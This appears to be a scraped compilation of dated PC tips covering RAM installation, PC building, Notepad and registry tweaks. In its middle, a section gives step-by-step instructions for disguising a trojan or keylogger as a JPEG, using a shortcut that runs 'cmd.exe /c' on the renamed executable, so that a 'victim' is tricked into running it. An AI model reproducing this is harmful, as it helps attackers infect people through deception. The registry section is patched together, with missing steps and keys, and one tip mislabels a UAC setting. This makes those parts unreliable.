How to Install RAM

These instructions will assist you in installing memory (RAM) into your computer.
Steps

1. Find out what type of RAM is required for your computer.
2. Find out how much of that type of RAM your computer can take.
3. Purchase RAM online; it's much cheaper.
4. Open your computer case (this may require a screw driver; usually a Phillips-Head.)
5. Once you have the case open, you need to locate the RAM slots on your motherboard. Most RAM slots are located on the top of the motherboard, on the right-hand side. You should see something in the computer that is similar to what you bought at the store.
6. Push the clamps OPEN to release the memory (if there is RAM already in there, which there may or may not be, depending on whether you're building a computer or altering an existing one). Remove old memory.
7. Look at the new memory and survey the motherboard memory slots. They should have a notch in each memory slot.
8. Line the notch on the motherboard up with the notch on the new memory.
9. Press gently but firmly until claps close completely. Once you have done this, the memory should be installed correctly.
10. Turn on the computer.
11. Once you have successfully booted the system, turn the machine off again and put the side panel back on the computer.
12. VOILA! You have just installed new RAM.


Tips

* If you are getting a beep when you turn on the computer, you have either installed an incorrect memory type, or you have installed the memory incorrectly. If this is a computer that you purchased at a store, you should contact the store or the manufacturer of the computer to find out what the beep code means.
* If you hear anything other than a single beep lasting one second, check your motherboards' documentation for an explanation of beep codes. Beep codes are a warning system when one or more components fails the POST (Power On Self Test), and is usually due to malfunctioning or incompatible hardware.
* If you are adding more RAM (not replacing), make sure there are enough RAM slots. Often you need to buy the exact same RAM as you currently have. Also, having a pair of 512MB is often cheaper than replacing a 512MB with a 1024MB.

* These instructions are for Desktop computers, not Laptops.
* Make sure to discharge any possible static buildup before touching RAM; it is extremely sensitive to ESD (Electro-Static Discharge). Do this by touching something metal before touching your computer

7 Easy Steps To Build Your own Computer

Building your own computer is easier today than ever before. Why settle for a PC that you pay to much for and does not have the flexibility of a custom build.

We have a step by step instructional that will help you in building your own computer.



* In order to build your computer you must have the parts. Parts you will need include motherboard, processor, heat sink, ram, power supply, case, hard drive, cd/dvd roms, and thermal paste. Some motherboards come with integrated sound, video, and Ethernet ports. I recommend reading your motherboard user manual to find the specific compatible parts that you will need for your endeavors.

* Installing the motherboard can be a daunting task if you don’t follow the motherboard user manual. It will guide you through all of the jumper settings and instruct you on screwing it into the case. One very important note to remember is use a grounding strap at all times when handling circuit cards and the motherboard! If this step is not followed you could potentially destroy them permanently.

* After the motherboard is installed you must install the motherboard components, you may want to start with the processor and heat sink. Again ground yourself before touching any of the components. Installing the processor is simple for most types of processors. (this applies to most types of processors) All you do is lift up the arm on the processor slot, line up the arrow on the processor with the slot and the push the arm back down. Installing the heat sink isn’t much more difficult. Spread a thin layer of thermal paste on the heat sink and snap it in on top of the processor. Each one snaps in different so refer to the manual for proper installation. Next comes the installing of the ram. It is the easiest step of the process. You open the snaps on the ram slots on the motherboard, line up the notches, and push it down. Too easy.

* The next step in the process is to put in the power supply. This is done by first screwing it into the case. Then you plug in the power cables into the motherboard. Usually it has a 20 pin connector and a 4 pin that plug straight into the motherboard. The other power connectors will be connected when the cd/dvd ROMs and hard drive are installed.

* In order to make your computer function properly you will need to install the hard drives and the cd/dvd drives precisely by the operator manual. Usually it is just screw them in and plug it up but that can sometimes differ. Depending on whether or not you are using IDE or Sata devices the power cables and data cables hook up differently.

* Now just about all of the hardware installation is complete. You just have to install any add in cards you may have. For example sound card, modem or maybe a video card. Pretty much all of these cards just push in. You line up the card with the empty slot and push in it. But remember if you are having problems refer to the user manual.

* We have just the last step left before your pc is up and running. That is giving it the software it needs to run. Installing the operating system is just click the next button. Literally while you are installing the os screens popup and you click next. For more detailed information refer to the operating system manual. It will give you a graphical representation for the installation. When you have finished installing the os you need the drivers for the system. A cd usually comes with the parts. After they are installed your pc should be up and running.

Notepad tricks

Open a blank Notepad file

* Write .LOG as the first line of the file, press enter.

* Save the file and close it.

* Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.

* Type your notes and then save and close the file.

Each time you open the file, Notepad repeats the process, appending the time and date to the end of the file and placing the cursor below it.

Hide your exe files into a jpg file

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

SOME REGISTRY TIPS

ADD OPEN WITH TO ALL FILES

You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the ".txt" key.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows
undll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.

LOCKOUT UNWANTED USERS

Want to keep people from accessing Windows, even as the default user? If you do not have a domain do not attempt this.

1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x delete

CUSTOMIZE SYSTEM TRAY
You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you can corrupt some trial licenses of software that you may have downloaded.

1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify. Enter anything you like up to 8 characters.

If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM.

ADDING AN APPLICATION TO RIGHT CLICK
Here is how to add any application to the Context Menu when you right click on any Folder. This way you do not have to always go to the Start Menu. When you right click on any folder, you can have access to that application, the same as using Sent To.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell
3. Add a new Key to the "Shell" Key and name it anything you like.
4. Give it a default value that will appear when you right click a folder, i.e. NewKey (use an "&" without the quotes, in front of any character and it will allow you to use the keyboard)
5. Click on the Key HKEY_CLASSES_ROOT\Folder\shell\NewKey
6. Add a New Key named Command
7. Set the (Default) value of the application you want to run
8. For example: c:\program files\internet explorer\iexplore.exe (Include the full path and parameters if you need them)

When you want to right click on any folder and want to open up an Explorer window of that folder.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell

4. Set the (Default) value to "E&xplore From Here "
5. Right Click the "RootExplore " Key and add a new Key "Command"to the RootExplore

If you want to create a Logon Banner: A message box to appear below your logon on.

1.Open RegEdit
2.Go To

3.Create a new String value"LegalNoticeCaption "
4. Enter the Title of the window. What is displayed in the Title Bar.

DISABLING MY COMPUTER


In areas where you are trying to restrict what users can do on the computer, it might be beneficial to disable the ability to click on My Computer and have access to the drives, control panel etc.
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOT\CLSID section
4.Delete the entire section.
Now when you click on My Computer, nothing will happen.
You might want to export this section to a Registry file before deleting it just in case you want to enable it again. Or you can rename it to 20D0HideMyComputer4FE0-3AEA-1069-A2D8-08002B30309D. You can also hide all the Desktop Icons, see Change/Add restrictions.

To make Windows use multiple Start Menu Columns instead of a single scrolling column, like Windows 9x had, Also if you are using Classic Mode in XP

To turn off the display of local or networked drives when you click on My Computer:
1.Open RegEdit

4.Give it a value of 3FFFFFF

The Key 5.0 is whatever version of IE you have

For Internet Explorer:
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
3. Add a string value "Window Title" (use a space)
4. Modify the value to what ever you like.

ADD/DELETE PROGRAMS TO RUN EVERY TIME WINDOWS STAR

You can start or stop programs from executing at boot up by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.

To add or remove programs in the Registry
1.Open RegEdit
2.Go to the desired Key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion \Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion \RunServices

3. Add a new String Value and name it anything you like
4. For the value data, enter the path and executable for the program you want to run.

By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.

If you add the value to the RunOnce key the program will run once and be removed from the key by Windows.

4.Delete the value IsShortcut
5.Open the next Key PIFFILE

Customize Internet. Explorer Title bar

This tip won't make your computer any faster but may help personalize your computer experience. Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.

Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)

1. If you're annoyed by Internet Explorer's incessant barking that you've lowered your security settings (like, if you're a non-paranoid expert), launch "gpedit.msc" from either the Run command or Start Search field, navigate through Local Computer Policy / Computer Configuration / Administrative Templates / Windows Components / Internet Explorer. In the rightmost pane, scroll to the bottom and double-click "User Account Control: Switch to the secure desktop when prompting for elevation." Disable it, and you can keep UAC turned on without getting turned off by the embarrassingly craptacular Aero Basic theme.

6. Vista can send you emails! The Computer Management tool can still be accessed by right-clicking "Computer" and selecting "Manage" from the menu. However, now you can attach a task to any event.
